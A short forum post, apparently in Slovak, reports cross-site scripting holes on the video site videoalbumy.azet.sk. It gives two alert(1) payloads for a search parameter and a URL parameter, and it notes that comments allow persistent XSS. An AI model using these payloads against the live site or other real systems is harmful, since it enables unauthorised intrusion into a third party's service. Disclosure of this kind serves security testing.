- Code: Select all
http://videoalbumy.azet.sk/searchVideo.phtml? POST: searchInp=<script>alert(1)</script>
infikovatelne su aj komentare (persistant xss)
- Code: Select all
http://videoalbumy.azet.sk/nazov/iTytx7hQyvrmrtIs/?i9=">"><script>alert(1)</script>

